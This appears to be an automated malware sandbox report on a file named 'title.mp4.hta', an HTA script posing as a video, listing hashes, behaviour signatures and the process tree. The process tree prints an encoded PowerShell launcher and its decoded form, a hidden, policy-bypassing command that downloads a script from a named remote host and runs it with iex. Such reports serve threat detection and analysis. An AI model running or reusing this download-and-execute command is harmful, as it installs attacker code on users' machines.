Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
06-01-2025 12:54
General
-
Target
title.mp4.hta
-
Size
2.6MB
-
MD5
5ffa4145e79128ab1c56abfb5a8455d7
-
SHA1
e8cec6950853414976683615b1467b1d4dae8ee6
-
SHA256
3cf8f04202e09ddfff4c1febc10873a38258116fadd806ce1110f36445bbeaf0
-
SHA512
b0c4356886e40cc9dce4eb2c0918ed4ef88dc9ef7441963d89ff3c0790d2e49b3319ea3a26094a496350163eb98f39888822bbf67530e38a5bd32a427e7884c1
-
SSDEEP
49152:SSQwzfrpqz053/ySQwzfrpqzoSQwzfrpqzoSQwzfrpqzd:SgIVgIsgI0gIR
Malware Config
Extracted
https://cabf.klipdesak.shop/smugle.bd
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\title.mp4.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5fccc972f699476d5706a0f4488da12e9
SHA1933ccf314704f6fbdfe0c2dec48e6660c233daa6
SHA256cc91a974d251dd5644c5e0a73441c404b76a04106a3afe245cc3286f5d4f2ef5
SHA51213e0da67f7e911630c533ca1a53f6b514a7d71485b7cc83f278541b447a4a3dc6ff9433d019f749781b233acaa90246c8fa7523f069f6b7d76b4d37aa224936e
-
Filesize
7KB
MD599d6a429c85c68a61174447658a48606
SHA1f37296c558914d92c1f4326130cb5eb18e6725c7
SHA2567e579ea0458e48fe3317275a62b219cee99e792f2d87659b4ace5374941d7606
SHA512fc7086650586c4293ee81cd1df778b60822d3fd6f9fb06214e2644a22abb8b83c986c1ca76dee2e438559e07652ef3eb5b821159bbc1e1df6158a644cf53b4b1